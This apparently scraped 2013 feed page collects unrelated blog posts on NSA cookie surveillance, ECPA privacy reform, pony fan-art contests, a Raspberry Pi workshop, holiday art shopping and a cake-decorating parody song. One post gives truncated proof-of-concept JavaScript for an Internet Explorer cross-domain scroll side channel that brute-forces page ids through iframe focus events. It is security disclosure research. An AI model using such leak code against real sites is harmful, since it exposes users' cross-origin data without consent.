NSA Tracks People Using Google Cookies
Dec. 12th, 2013 06:21 ambruce_schneier_feedThe Washington Post has a detailed article on how the NSA uses cookie data to track individuals. The EFF also has a good post on this.
I have been writing and saying that surveillance is the business model of the Internet, and that government surveillance largely piggy backs on corporate capabilities. This is an example of that. The NSA doesn't need the cooperation of any Internet company to use their cookies for surveillance purposes, but they do need their capabilities. And because the Internet is largely unencrypted, they can use those capabilities for their own purposes.
Reforming the NSA is not just about government surveillance. It has to address the public-private surveillance partnership. Even as a group of large Internet companies have come together to demand government surveillance reform, they are ignoring their own surveillance activities. But you can't reform one without the other. The Free Software Foundation has written about this as well.
Little has written how QUANTUM interacts with cookie surveillance. QUANTUM is the NSA's program for real-time responses to passive Internet monitoring. It's what allows them to do packet injection attacks. The NSA's Tor Stinks presentation talks about a subprogram called QUANTUMCOOKIE: "forces clients to divulge stored cookies." My guess is that the NSA uses frame injection to surreptitiously force anonymous users to visit common sites like Google and Facebook and reveal their identifying cookies. Combined with the rest of their cookie surveillance activities, this can de-anonymize Tor users if they use Tor from the same browser they use for other Internet activities.
Magician
Dec. 12th, 2013 09:52 pmpuzzlement posting in incrementumTonight, V glowed with joy as he explained to me he'd done some magic, to wit, placing a tiny boat toy to float in a glass of water.
The Hearth's Warming Micro Comic Giveaway Event, Day Four
Dec. 11th, 2013 07:49 pmfrith posting in ponyville_trot
Source: http://hydrusbeta.deviantart.com/ar
The deadline is still fuzzy. The details for Day Five went up at 7 pm EST, and the submitter stays open after that for a while... there might be an hour of grace. Yep, I think it just closed now, at about 8 pm EST.
Another day, another two winners declared, one for the prompt, one for the coloured-in line drawing. ^_^ I think the prompt effort gets judged, while the coloured lineart winner is randomly chosen. Each winner receives as a prize of four IDW micro-fun pack comic sets. Each pack contains a (micro) comic, a poster, stickers, tattoo, and "how to" instructions for drawing a my little pony.
The Day Four assignment was "Draw ponies in love". Or colour in Pixelkitties' lineart of two ponies in giant pony costumes. There is also the ongoing option to draw whatever you fancy. Or at least they "won't hold it against you". I was drawing a blank on the love prompt, so I went for something festive: redoing a pony playing a violin. The pictures ended up in this gallery here. My violin pony was #26 in the gallery of 31 submissions. A few more submissions than yesterday!
For Day Five, the assignment is "Draw ponies wrapping or unwrapping presents". The lineart to be coloured this time is of Pinkie in spy-goggles dangling upside-down from a rope by Pixelkitties. The submitter is here, and the pictures end up in this gallery here.
And now suddenly I can comment on Equestria Daily again: there's a new field at the bottom that just requires name, email and website. Progress!
Help Bring Privacy Laws Into 21st Century
Dec. 11th, 2013 11:36 pmkrebsonsecurity_feedLost in the ongoing media firestorm over the National Security Agency’s domestic surveillance activities is the discussion about concrete steps to bring the nation’s communications privacy laws into the 21st Century. Under current laws that were drafted before the advent of the commercial Internet, federal and local authorities can gain access to mobile phone and many email records without a court-issued warrant. In this post, I’ll explain what federal lawmakers and readers can do to help change the status quo [tl;dr: if you'd rather skip the explanation and go right to the What Can You Do? section, click here] 
The Center for Democracy & Technology, a policy think-tank based in Washington, D.C., has a concise and informative primer on the Electronic Communications Privacy Act (ECPA), the 1986 statute that was originally designed to protect Americans from Big Brother and from government overreach. Unfortunately, the law is now so outdated that it actually provides legal cover for the very sort of overreach it was designed to prevent.
Online messaging was something of a novelty when lawmakers were crafting the ECPA, which gave email moving over the network essentially the same protection as a phone call or postal letter. In short, it required the government to obtain a court-approved warrant to gain access to that information. But the Justice Department wanted different treatment for stored electronic communications. (Bear in mind that this was way before anyone was talking about “cloud” storage; indeed CDT notes that electronic storage of digital communications in 1986 was quite expensive, and it wasn’t unusual for email providers to delete messages that were more than a few months old).
CDT explains the bargain that was struck to accommodate the government’s concerns:
“Congress said that after 180 days email would no longer be protected by the warrant standard and instead would be available to the government with a subpoena, issued by a prosecutor or FBI agent without the approval of a judge,” CDT wrote. “At the same time, Congress concluded that, while the contents of communications must be highly protected in transit, the ‘transactional data’ associated with communications, such as dialing information showing what numbers you are calling, was less sensitive. ECPA allowed the government to use something less than a warrant to obtain this routing and signaling information.”
Fast-forward to almost 2014, and we find of course that most people store their entire digital lives “in the cloud.” This includes not only email, but calendar data, photos and other sensitive information. Big cloud providers like Google, Microsoft and Yahoo! have given users so much free storage space that hardly anyone has cause to delete their stuff anymore. Not only that, but pretty much everyone is carrying a mobile phone that can be used to track them and paint a fairly detailed account of their daily activities.
But here’s the thing that’s screwy about ECPA: If you’re the kind of person who stores all that information on your laptop, the government can’t get at it without a court-ordered warrant. Leave it in the hands of email, mobile and cloud data providers, however, and it’s relatively easy pickings for investigators.
“There has been an interpretation of the law from the government that says any document stored in the cloud can be accessed with a subpoena, regardless of how old it is,” said Mark Stanley, a communications strategist with CDT. “The government can access emails over 180 days old with just a subpoena. “We also know that the [Justice Department] has interpreted the law to say that any emails that are opened — regardless of how old they are — can be accessed without a warrant.”
Just how easy is it to get an administrative subpoena? Mark Rasch, a Bethesda, Md. lawyer and former Justice Department prosecutor, said administrative subpoenas (which don’t need a sign-off from a judge and allow investigators to seek information without any external check) are extremely easy to get and to serve. The problem, he said, is that subpoenas place most of the burden on the recipient of the request.
“When you subpoena a third party, that third party has fundamentally no ability to challenge the request, because they don’t know if the request is relevant to the investigation or not,” Rasch said. “As a result, it’s in the submitter’s best interest to make the request as broad as possible in the hopes that it will turn up something that’s relevant to the investigation.”
Take the hypothetical case of a subpoena that directs a free Webmail provider to turn over all of the Web browsing and email records of a specific customer for an entire year. Is that provider willing or able to pass the costs of complying with that request on to the consumer? In the vast majority of cases, Rasch said, it doesn’t make economic sense for the provider to challenge these subpoenas, so they simply comply.
Updating ECPA would mean that before prosecutors or other lawyers can get this information, they would have to make an argument to a court about what information they’re seeking and how it’s relevant to an investigation, Rasch said.
“The idea is that before you can get an order to produce certain information, you’d have to do a little ‘mother, may I?’ Rasch said.
It not clear how many subpoenas are sent to email providers each year seeking customer records, but we recently got some sense of how frequently government investigators are asking for mobile device records. Senator Edward J. Markey (D-Mass.) asked this question of seven major wireless carriers, including AT&T, Verizon Wireless, Sprint and T-Mobile.
As The New York Times wrote on Dec. 9, the response from the carriers shows that last year they answered at least 1.1 million requests from law enforcement agencies seeking information on caller locations, text messages and other data for use in investigations. “Most of the requests were for information from a specific customer account,” The Times wrote. “But law enforcement agencies also received information from 9,000 so-called tower dumps, in which the agencies were granted access to data from all the phones that connected to a cell site during a specific period of time.”
Lawmakers in the House and Senate have introduced companion bills that would require law enforcement agencies to get a court-ordered probable-cause warrant to obtain email and other content stored in the cloud. The Senate Judiciary Committee has approved S. 607, a bill sponsored by the committee’s chairman, Sen. Patrick Leahy (D-Vt.), but the measure hasn’t yet progressed to the Senate floor for a vote.
In the House, H.R. 1852 has broad bipartisan support (110 Republicans and 47 Democratic co-sponsors at last count). Speaking on background, an aide to the House Judiciary Committee said the panel’s chairman, Rep. Bob Goodlatte (R-Va.), has been “aggressively meeting with stakeholders and several outside groups- including privacy advocates, industry and law enforcement — to identify ECPA reform priorities and geolocation privacy standards.” No word, however, on when the full committee might consider the House bill.
Interestingly, the effort bring ECPA’s protections into the digital age even has the support of the Justice Department. Testifying at a hearing in the House in May 2013, U.S. Attorney General Eric Holder said the DOJ supports the “general notion of having a warrant to obtain the content of communications from a service provider.” As The Hill noted at the time, Holder’s comments reiterate the department’s stated position taken earlier in the year, which found there was “no principled basis” for the 180 day distinction, and that legislation to expand ECPA’s protections has “considerable merit.”
So why aren’t these changes the law of the land already, aside from the usual partisan gridlock? Unfortunately, said CDT’s Stanley, movement on ECPA reform is currently being blocked by a proposal from the U.S Securities and Exchange Commission (SEC), which wants a special carve-out in the bill for regulatory agencies to get communications from online providers without a warrant.
So what can readers do about all this? For starters, sign a petition at the White House’s “We the People” site, asking the Obama administration to reform ECPA. The petition, which currently has more than 70,000 supporters but needs over 100,000 to force a response from the White House, calls on the administration to support ECPA reform and to “reject any special rules that would force online service providers to disclose our email without a warrant.”
Also, get educated about which companies stand up for your privacy, and don’t patronize companies that fail to do so. For starters, check out the Electronic Frontier Foundation (EFF) 2013 “Who Has Your Back” report, which tracks several ways in which communications companies can help protect user privacy. EFF rates providers with zero to five stars, granting stars for things like promising to notify users about government demands for data whenever the company is not legally prevented from doing so. “Notably, Verizon does not have such a notification policy and did not receive a star,” the EFF notes. “In fact, Verizon was the only company to receive zero stars.” [In fairness, Apple, AT&T and Yahoo! fared almost as poorly].
Finally, consider using an email client — instead of just Webmail — and encrypt your communications. Wefightcensorship.org has a great primer on how to do that, using Mozilla Thunderbird and PGP. Ars Technica recently published step-by-step instructions for encrypting email on a PC or Mac.
X-Domain scroll detection on IE using focus
Dec. 11th, 2013 07:13 pmgarethheyes_feedThis is a pretty cool bug. I use the focus event on an iframe to detect if the iframe has been scrolled x-domain. It’s because IE fires the onfocus event of the iframe when the scroll occurs. This means using 1 network request we can discover if a site contains a particular id provided the page scrolls inside the iframe. Using multiple iframes you could quite easily bruteforce larger numbers or maybe a dictionary list of words and because we are using hash the future requests aren’t sent to the server.
First we need a page with an id we can scroll to.
<p>test</p>
<p>test</p>
<p>test</p>
<p>test</p>
<p>test</p>
<div id=1337>target</div>
When visiting this page it should jump to #1337 provided the window is small enough.
Next we create an iframe and attach an onfocus event:
<iframe src="http://hackvertor.co.uk/scroll/test.h
Now we need to create the clicks to trigger the onfocus event and produce the scroll.
id=0;
var anchor = document.createElement('a');
anchor.target="x";
document.body.appendChild(anchor);
timer=setTimeout(function f(){
id++;
document.getElementById('pos').innerText = id;
anchor.href='http://hackvertor.co.uk/scr
anchor.click();
if(id<10000) {
timer=setTimeout(f,0);
}
},0)
The code keeps calling itself until 10,000 iterations or until the onfocus event fires and clears the timeout. Which it does on IE with 1337 
Brony Dating Site
Dec. 11th, 2013 01:13 pmfrith posting in ponyville_trotThere's a Brony dating site! Do Trekkers, Whovians, Brown Coats and Potterusses have such a thing? 8^D
Getting Started with the Raspberry Pi
Dec. 11th, 2013 01:00 pmaccidentallyincode_feed
Credit: Wikimedia
I lucked out in being in town when the Women Powering Technology Raspberry Pi event was on, and also in hearing about it – and being allowed in at the last minute!
Of course I had heard about the Raspberry Pi, and loved the idea, but I’m pretty intimidated by hardware and cables, so it had never occurred to me to buy one. Now, I want one!
Judi McCuaig from the University of Guelph was running the workshop, and started by talking about their use of the Raspberry Pi in their first year course. I have long thought it is cruel an unusual to teach first years C or even C++, but since they have to teach C at Guelph right now, at least it’s fun and exciting.
Instead of a textbook, each student buys a Raspberry Pi (no more expensive), which they partnered with a hacker space to package and sell to the students. It has a custom OS on it, and comes with everything the students need to get started.
It addresses the problem of the students bringing in their own computers, which they are afraid to break. Now they all have the same platform. And the flakey SD card (or, pulling it out at the wrong time) means the students are even using git and checking in their code constantly.
I think it’s a really, really cool idea, and aside from the use of C, addresses some of the improvements in curriculum and experience that we know make computer science more inclusive.
Then, we had a little time – maybe an hour – to play with it ourselves. We started by making a light blink on and off. My team (a Chemical Engineer, and Electrical Engineer, and s Software Engineer – which sounds like the start of a joke…), by going over and being the last to hand back our equipment, managed to also create a little program that took in a string and blinked in out in Morse Code. So much fun!
December Art Roundup & Give-Away
Dec. 11th, 2013 12:12 pmepbot_feedWhether you're shopping for gifts or just looking to deck your own geeky halls, I think I've got you covered this month!
First up, the fantabulous ACEOs of Jessica Grundy:
There is so much more where those came from, too, and all of Jessica's art cards are only $3 each! GO NUTS, PEOPLE. (Everything also comes in larger sizes, too, up to 13X19.)
I'm especially loving her circus series:
Btw, if you want to buy art as a gift, I recommend sticking to smaller sizes like these art cards - unless you know for sure the recipient wants a particular piece. Speaking as an art lover, I can tell you there's a special kind of panic when someone gives you a big piece you *know* you don't have room for.
With that said, if you know someone who loves The Rocketeer, then by all means, buy them this:
If you like those, then check out his site for Doctor Who, Sherlock, and more!
Oh, and Danny actually gave me that Star Wars print for the give-away board (did I mention what a great guy he is? No? 'Cuz HE IS.) so comment below if you'd like to win it!
Reader Carol C. introduced me to the fantastical steampunk art of Mark Jason Page, and I am thoroughly smitten:
Page's prints are all limited editions on fine rag watercolor paper, so they don't come cheap. The Seahorse Carraige up there is $150, and this beauty titled "The Blue Legion" is $200:
(While browsing his site I learned that Page is a Disney Imagineer. My delight just doubled. Disneyland Paris has a steampunky Tomorrowland, you know. SO WHY NOT HERE? [sob])
Ahem.
To get us in a wintry frame of mind, here's the latest from Amy Mebberson of Pocket Princesses fame:
And now, to end on a more affordable AND Christmas-y note: I've just spent a lovely few hours browsing cheap holiday art on Etsy, and I'm going to share. (If you buy small pieces it's easy to tuck them away with the rest of your decorations come January, and swapping out a few frames around the house is one of the easiest ways to decorate!)
So. Check it out. These are all ORIGINAL pieces of art for under $20 each. Save me from myself, you guys - or so help me I WILL buy them all.
Sure, you could DIY these with some old sheet music/book paper and vintage clip art, but if you don't want to be bothered then grab the candy cane for under $10 at WinterBerry Cottage or the holly for $8 at MadameMemento.
K, that does it for this month! Now, you know the drill: comment below to enter to win the art of your choice from my Pinterest Art Give-Away Board! And I'll ship anywhere, so comment away, internationals! I'll announce the randomly selected winner in a few days.
First up, the fantabulous ACEOs of Jessica Grundy:
Who knew an Alien could be cute? NOT ME.
There is so much more where those came from, too, and all of Jessica's art cards are only $3 each! GO NUTS, PEOPLE. (Everything also comes in larger sizes, too, up to 13X19.)
I'm especially loving her circus series:
LOVE.
Btw, if you want to buy art as a gift, I recommend sticking to smaller sizes like these art cards - unless you know for sure the recipient wants a particular piece. Speaking as an art lover, I can tell you there's a special kind of panic when someone gives you a big piece you *know* you don't have room for.
With that said, if you know someone who loves The Rocketeer, then by all means, buy them this:
"Like A Hood Ornament" (Ha!) by Danny Haas
(10X7 prints start at under $18)
I fell in love with this print at that little FX convention last month, so much so that I'm planning to displace a large Tara McPherson poster so I can hang it in my office. THAT'S LOVE.
Danny has a crisp graphic style that I can't get enough of, so it's hard to pick just a few favorites. This one's really popular, though:
(10X7 prints start at under $18)
I fell in love with this print at that little FX convention last month, so much so that I'm planning to displace a large Tara McPherson poster so I can hang it in my office. THAT'S LOVE.
Danny has a crisp graphic style that I can't get enough of, so it's hard to pick just a few favorites. This one's really popular, though:
If you like those, then check out his site for Doctor Who, Sherlock, and more!
Oh, and Danny actually gave me that Star Wars print for the give-away board (did I mention what a great guy he is? No? 'Cuz HE IS.) so comment below if you'd like to win it!
Reader Carol C. introduced me to the fantastical steampunk art of Mark Jason Page, and I am thoroughly smitten:
And not just because of that mechanical seahorse. (Although, c'mon, look at that seahorse.)
Page's prints are all limited editions on fine rag watercolor paper, so they don't come cheap. The Seahorse Carraige up there is $150, and this beauty titled "The Blue Legion" is $200:
The print is a whopping 22X16, though, so talk about a showpiece!
One more:
So perfect.
Head over to Page's site to see the rest!
(While browsing his site I learned that Page is a Disney Imagineer. My delight just doubled. Disneyland Paris has a steampunky Tomorrowland, you know. SO WHY NOT HERE? [sob])
Ahem.
To get us in a wintry frame of mind, here's the latest from Amy Mebberson of Pocket Princesses fame:
"Letting Go," 13X19 Giclee, (LE of 50), $125 at Acme Archives
I haven't seen Frozen yet, but I'm loving all the fan art coming out! (This one is officially licensed with Disney, though, so I guess that's less "fan art" and more... officially licensed... art. :D)
And now, to end on a more affordable AND Christmas-y note: I've just spent a lovely few hours browsing cheap holiday art on Etsy, and I'm going to share. (If you buy small pieces it's easy to tuck them away with the rest of your decorations come January, and swapping out a few frames around the house is one of the easiest ways to decorate!)
So. Check it out. These are all ORIGINAL pieces of art for under $20 each. Save me from myself, you guys - or so help me I WILL buy them all.
"Blue Squirrel" Original watercolor, $12 by Kristina Brozicevic
"Little Red Bird" Original Colored Pencil Drawing, $15 by Jennifer Nilsson
(She also had an adorable little red fox in a stocking, but I just bought that one. MWUAH-HA-HAA.)
Original Dictionary Painting of Jack Skellington, $15 by Undead Ed
Small Angel Painting (2.9X4.7), original watercolor, $15 by Kristina Valic
Mixed Media Snowman on wood board, original art, $20 by BrightEyedLucy
If you like any of those be sure to click through to the artists' Etsy shops to see more of their work.
And finally, not exactly original art, but still pretty:
Sure, you could DIY these with some old sheet music/book paper and vintage clip art, but if you don't want to be bothered then grab the candy cane for under $10 at WinterBerry Cottage or the holly for $8 at MadameMemento.
K, that does it for this month! Now, you know the drill: comment below to enter to win the art of your choice from my Pinterest Art Give-Away Board! And I'll ship anywhere, so comment away, internationals! I'll announce the randomly selected winner in a few days.
Winter Blunderland
Dec. 11th, 2013 02:00 pmcakewrecks_feedThose bell things
Are they listing?
Yellow snow
Stomach's twisting
Unusual sight
He's happy tonight
Gawking in a winter blunderland.
Gone awaaay
is the bluebird
In his plaaace
is a reinturd
My feeling is strong
That this is all wrong
Gawking in a winter blunderland.
This is really quite the bug-eyed snowman!
I'd just rather not see him around
He'll say, "Won't you buy me?"
I'll say, "No, man!"
"You've even got the penguins feeling down!"
We should kiiill
this with fire
I think thiiis
is expired
The way Rudy's splayed:
He may need first aid.
Gawking in a winter blunderland.
Let's sing the praises of Mike M., Lena C., Grainne A., Adam S., Tara K., Jessi C., Michael B., Kendra M., Dan E., and Amy N.
The Hearth's Warming Micro Comic Giveaway Event, Day Three
Dec. 10th, 2013 09:16 pmfrith posting in ponyville_trot
Source: http://spark-burst.deviantart.com/art/L
The deadline is still fuzzy. The submitter is supposed to "close when the post for [next day] goes up", which was at 7 pm EST today. The submitter was closed by 9 pm EST, give or take a few minutes.
Another day, another two winners declared, one for the prompt, one for the coloured-in line drawing. ^_^ Each winner, both chosen at random, receive as a prize of four IDW micro-fun pack comic sets. Each pack contains a (micro) comic, a poster, stickers, tattoo, and "how to" instructions for drawing a my little pony.
The Day Three assignment was at first "Draw ponies playing in the snow" (again) but that got corrected to "Draw ponies snuggling by the fire". Or colour in Pixelkitties' lineart of Alicorn Princess Big MacIntosh. The pictures ended up in this gallery here. I submitted a drawing of Fluttershy having tea with deer in a hut fashioned from bent trees. It was #28 out of 28 submissions. Not a heavy turnout.
For Day Four, the assignment is "Draw ponies in love". The lineart to be coloured this time is Pixelkitties' two ponies in giant pony costumes. The submitter is here, and the pictures end up in this gallery here.